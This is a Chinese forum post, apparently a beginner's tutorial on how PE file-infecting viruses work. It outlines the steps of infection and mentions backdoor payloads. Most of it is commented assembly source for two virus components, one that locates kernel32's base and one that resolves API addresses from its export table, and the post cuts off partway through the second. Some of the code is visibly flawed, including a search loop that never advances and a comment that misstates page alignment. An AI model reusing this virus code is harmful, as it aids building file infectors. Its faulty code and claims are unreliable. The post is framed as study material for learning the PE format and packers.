PE文件病毒虽然因为传播不及蠕虫已经很少独立存在了,但是仍然有很多病毒把他的感染部分作为一个功能.而且学习PE文件病毒可以让我们对PE的格式更好的了解,而加壳程序的外壳部分也运用到了和PE文件病毒类似的技术,所以还是可以了解下的
我也是刚学习这方面的东西,就把一点点心得写了下来.参考了罗云彬的<windows环境下32位汇编语言程序设计>在下菜鸟一只,望高手指教~

首先说说PE文件病毒的工作方式．一个PE文件病毒基本上有这几个功能：

１）获取kernel32.dll的基地址
２）通过所获得的kernel32的基地址通过dll的PE文件格式中的输出表获得以后要使用到的API的地址，并将他们存放在变量或是栈中，将来所调用的API直接通过CALL这些地址来实现．
３）查找要感染的文件并获得他们的基地址（通过CreateFile,CreateFileMapping,ViewOfMapFile将文件打开，当然调用的是getapi所找到的地址。其他过程和一般的程序没什么区别，所以就不写在这里了）
４）通过获得的文件的基地址来根据文件的PE文件格式来将病毒代码注入到该文件中，在这里有两种方法，一是通过给程序添加一个节（section)来将病毒注入，另一种是选取一个未用完的节（因为节在内存中是按１０００为单位对齐的）．
   当然了，病毒不可能只是复制自己而什么都不做，不然的话就没有破坏性了．．．在代码里都会有一段用来做点坏事～～比如开个后门～～
   好了，我们来具体看看这些有趣的东西～～～嘿嘿
第一个部分，获取K32的基地址

_GetK32 proc 
        local @dwReturn
        pushad
        mov   @dwReturn,0　　　　　　　;返回值，先设为0（即false）
        mov   edi,_dwKernelRet　　　   ;这里的_dwKernel32Ret　是[esp]，当程序通过ret指令结
                                       ;束的时候,系统会通过调用CreateProcess()函数来启动进 
                                       ;程，这时的堆栈中所存放的值就是Kernel32所在的那部分
                                       ;地址段中的一个地址。因此，如果我们在程序中的开头部
                                       ;分取出[esp]的值，就能通过这个值定位kernel32的基地址
        and   edi,0ffff0000h           ;因为WINDOWS是分页系统，4K一页，所以这条语句就是将 
                                       ;edi指向该页的基地址
@1:                                    ;由于分页系统中模块加载都是从每一页的页首开始，所以
                                       ;基地址总每页的页首地址
        cmp word ptr [edi],'ZM'        ;这一段是判断是否到达K32的基地址
        jnz @1
        mov esi,edi
        add esi,[esi+003ch]
        cmp word ptr [esi],'EP'
        mov @dwReturn,edi
        jz @2                         ;确认找到的是K32的基地址，跳
        sub edi,010000h               ;不是K32的基地址，则查看是不是在前一页              
        cmp edi,070000000h            
        jb @2                         ;如果小于07000000则不查找，因为K32不会在小于
                                      ;070000000前的页，在这里为了简单没有考虑出错情况，一 
                                       ;般出错的话就直接结束吧
        jmp @1
@2:     add esp,0ch
        popad
        mov eax,@dwReturn             ;将找到的K32的基地址给EAX返回
        ret
_GetK32 endp

第2部分，GetApi部分
_GetApi proc                          ;输入ESI（指向一个API名字）输出该API的地址
        mov edx,esi                   ;先将该API名字的首地址备份个
@1:     cmp byte ptr [esi],0          ;这一段是获取API名字的长度，因为以0作为字符串结束的
                                      ;标记，所以比较esi所指地址的值是否为0来判断是否是字
                                      ;符串的结束
        jz @2                         ;是，跳
	inc esi                       ;不是则让ESI指向下一个字符，继续判断
	jmp @1

@2:     inc esi                       
        sub esi,edx                   ;esi-edx就是API的字符串长度了
	mov ecx,esi
	xor eax,eax
        mov count,ax                  ;COUNT存放所输入的API在ENT的数组序号（即对应关系中的;X）
	mov esi,hDllKernel32          
	add esi,3ch                   ;即让ESI指向NT头，3c是dos头的长度
	mov esi,[esi+78h]             ;让ESI指向DATA DIRECTORY数组的首地址（这个值是RVA）
                                      ;由于输出表是放在数组的第一个，所以所指的这个数组的
                                      ;首地址的RVA就是输出表的首地址的RVA
	add esi,hDllKernel32          ;输出表的VA
	add esi,1ch                   ;ESI指向AddressOfFunctions
        lodsd                         ;读取AddressOfFunctions的内容          
	add eax,hDllKernel32          ;EAT(输出地址表）的VA
	mov eatVA,eax
	lodsd                         ;读取AddressOfNames的内容
	add eax,hDllKernel32          ;ENT（存放输出的API的名字的数组）
	mov entVA,eax                 
	lodsd                         ;读取输出序数表EOT的RVA
	add eax,hDllKernel32          ;VA
	mov OrdinalVA,eax
	mov esi,entVA

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！